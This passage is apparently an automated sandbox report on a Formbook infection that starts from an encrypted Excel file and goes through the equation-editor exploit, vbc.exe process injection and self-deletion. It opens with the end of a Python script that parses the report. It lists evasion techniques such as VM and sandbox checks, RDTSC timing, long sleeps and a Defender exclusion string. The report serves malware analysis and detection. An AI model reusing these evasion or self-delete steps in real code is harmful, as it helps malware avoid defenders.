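    index_b = {(apis[0], addr & 0xFFFF): addr for addr, apis in funcs[b]}
    deltas = Counter()
    for addr, apis in funcs[a]:
        other = index_b.get((apis[0], addr & 0xFFFF))
        if other is not None:
            deltas[other - addr] += 1
    return deltas

if __name__ == "__main__":
    funcs = parse_code_functions(REPORT_LINES)
    for proc, techs in sorted(injection_techniques(funcs).items()):
        print(f"process {proc}: {', '.join(techs) or 'none'}")
    for delta, n in relocation_deltas(funcs, 5, 7).most_common():
        print(f"{n} functions of process 5 reappear in process 7 shifted by {delta:#x}")
```

Run on the excerpt it reports that both processes carry the full hollowing, section-mapping and APC sets, and that ten of the twelve excerpted functions shift by -0x180000 and the other two by -0x300000 between the processes. That is two separate modules: one relocated from 0x00400000 (the 5.2.vbc.exe.400000.0.unpack Yara hit) to 0x00100000 (the help.exe dump at base 0000000000100000 in the Yara list), and a second one moved from the 0x0092xxxx range to 0x007Axxxx. Pairing on the low 16 bits works because both deltas are multiples of 0x10000; for arbitrary bases pair on the page offset and the function's byte pattern instead.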
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1829 4_2_001E1829
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E68B0 4_2_001E68B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E3168 4_2_001E3168
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E2250 4_2_001E2250
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EBAD8 4_2_001EBAD8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0470 4_2_001E0470
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0F98 4_2_001E0F98
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6FA8 4_2_001E6FA8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E4070 4_2_001E4070
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E3068 4_2_001E3068
Source: C:\Users\Public\vbc.exe Code function: 4_2_001ED898 4_2_001ED898
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E4080 4_2_001E4080
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E68A0 4_2_001E68A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5178 4_2_001E5178
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5188 4_2_001E5188
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E53D1 4_2_001E53D1
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E53E0 4_2_001E53E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E1CF2 4_2_001E1CF2
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EC570 4_2_001EC570
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5618 4_2_001E5618
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E5628 4_2_001E5628
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E0F0C 4_2_001E0F0C
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EB758 4_2_001EB758
Source: C:\Users\Public\vbc.exe Code function: 4_2_001EDF48 4_2_001EDF48
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E6F97 4_2_001E6F97
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022B4B0 4_2_0022B4B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00229250 4_2_00229250
Source: C:\Users\Public\vbc.exe Code function: 4_2_00221B20 4_2_00221B20
Source: C:\Users\Public\vbc.exe Code function: 4_2_00226BF8 4_2_00226BF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D510 4_2_0022D510
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D9A8 4_2_0022D9A8
Source: C:\Users\Public\vbc.exe Code function: 4_2_00221260 4_2_00221260
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022CEB8 4_2_0022CEB8
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022D730 4_2_0022D730
Source: C:\Users\Public\vbc.exe Code function: 4_2_0022C338 4_2_0022C338
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02880 4_2_00D02880
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D0408A 4_2_00D0408A
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D04E40 4_2_00D04E40
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06084 4_2_00D06084
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03850 4_2_00D03850
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03840 4_2_00D03840
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D00048 4_2_00D00048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06048 4_2_00D06048
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02870 4_2_00D02870
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D00012 4_2_00D00012
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D04DE0 4_2_00D04DE0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03188 4_2_00D03188
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D099A9 4_2_00D099A9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D03148 4_2_00D03148
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D06690 4_2_00D06690
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D0669B 4_2_00D0669B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D066A0 4_2_00D066A0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D097DC 4_2_00D097DC
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D09380 4_2_00D09380
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02B38 4_2_00D02B38
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D02B28 4_2_00D02B28
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B8B1 5_2_0041B8B1
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B963 5_2_0041B963
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C4B 5_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C50 5_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B493 5_2_0041B493
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B496 5_2_0041B496
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C539 5_2_0041C539
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D89 5_2_00402D89
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041CE85 5_2_0041CE85
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF12 5_2_0041BF12
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C795 5_2_0041C795
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E0C6 5_2_0092E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095D005 5_2_0095D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094905A 5_2_0094905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00933040 5_2_00933040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E2E9 5_2_0092E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D1238 5_2_009D1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_009563DB 5_2_009563DB
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: Processed APR12.xlsx OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0099F970 appears 81 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00973F92 appears 108 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0097373B appears 238 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0092DF5C appears 114 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007F3F92 appears 132 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007ADF5C appears 119 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007F373B appears 245 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 0081F970 appears 84 times
Source: C:\Windows\SysWOW64\help.exe Code function: String function: 007AE2A8 appears 38 times
Yara signature match
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393258433.00000000003C0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393093444.0000000000200000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000007.00000002.2393041245.0000000000100000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.2185411472.0000000003EEC000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229408433.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229356728.0000000000150000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.2229385526.0000000000310000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: xles[1].exe.2.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: explorer.exe, 00000006.00000000.2202179783.0000000003C40000.00000002.00000001.sdmp Binary or memory string: .VBPud<_
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/11@9/9
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Processed APR12.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVR10F1.tmp Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from UnmanagedMemoryStreamWrapper WHERE modelo=@modelo;?
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel5Erro ao listar Banco sql-UnmanagedMemoryStreamWrapper.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO UnmanagedMemoryStreamWrapper VALUES(@modelo, @fabricante, @ano, @cor);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: Processed APR12.xlsx ReversingLabs: Detection: 25%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\help.exe C:\Windows\SysWOW64\help.exe
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: Processed APR12.xlsx Static file information: File size 2693120 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, help.exe
Source: Binary string: help.pdb source: vbc.exe, 00000005.00000002.2229449674.0000000000699000.00000004.00000020.sdmp
Source: Processed APR12.xlsx Initial sample: OLE indicators vbamacros = False
Source: Processed APR12.xlsx Initial sample: OLE indicators encrypted = True

Data Obfuscation:

Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_012030AB push edx; retf 4_2_012030AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_01202BC7 push ss; ret 4_2_01202BC8
Source: C:\Users\Public\vbc.exe Code function: 4_2_001E74DF push B9FFFFFEh; ret 4_2_001E74E4
Source: C:\Users\Public\vbc.exe Code function: 4_2_002200C8 push esp; ret 4_2_002200C9
Source: C:\Users\Public\vbc.exe Code function: 4_2_00222B53 push ebx; retf 4_2_00222B5B
Source: C:\Users\Public\vbc.exe Code function: 4_2_00D09AC9 pushfd ; iretd 4_2_00D09ACA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B2A2 push cs; ret 5_2_0041B2A3
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3F2 push eax; ret 5_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3FB push eax; ret 5_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B3A5 push eax; ret 5_2_0041B3F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B45C push eax; ret 5_2_0041B462
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415414 push esp; ret 5_2_00415416
Source: C:\Users\Public\vbc.exe Code function: 5_2_00414F46 push cs; ret 5_2_00414F47
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF12 push dword ptr [8427D5C5h]; ret 5_2_0041C1FF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415FC5 push ebp; ret 5_2_00415FC6
Source: C:\Users\Public\vbc.exe Code function: 5_2_012030AB push edx; retf 5_2_012030AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_01202BC7 push ss; ret 5_2_01202BC8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092DFA1 push ecx; ret 5_2_0092DFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_007ADFA1 push ecx; ret 7_2_007ADFB4
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B2A2 push cs; ret 7_2_0011B2A3
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3A5 push eax; ret 7_2_0011B3F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3F2 push eax; ret 7_2_0011B3F8
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B3FB push eax; ret 7_2_0011B462
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00115414 push esp; ret 7_2_00115416
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011B45C push eax; ret 7_2_0011B462
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_0011BF12 push dword ptr [8427D5C5h]; ret 7_2_0011C1FF
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00114F46 push cs; ret 7_2_00114F47
Source: C:\Windows\SysWOW64\help.exe Code function: 7_2_00115FC5 push ebp; ret 7_2_00115FC6
Source: initial sample Static PE information: section name: .text entropy: 7.47179869849

Persistence and Installation Behavior:

Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xles[1].exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\help.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: Processed APR12.xlsx Stream path 'EncryptedPackage' entropy: 7.99992880466 (max. 8.0)

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 2684, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 00000000001085E4 second address: 00000000001085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\help.exe RDTSC instruction interceptor: First address: 000000000010896E second address: 0000000000108974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088A0 rdtsc 5_2_004088A0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2324 Thread sleep time: -360000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2704 Thread sleep time: -102329s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 920 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\explorer.exe TID: 2404 Thread sleep time: -35000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\help.exe TID: 1916 Thread sleep time: -34000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\help.exe Last function: Thread delayed
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 102329 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000006.00000002.2393233250.00000000001F5000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.2203360504.0000000004263000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: vmware
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 00000006.00000000.2203299688.0000000004234000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000004.00000002.2184096619.0000000002AF0000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000006.00000000.2185699010.0000000000231000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\help.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
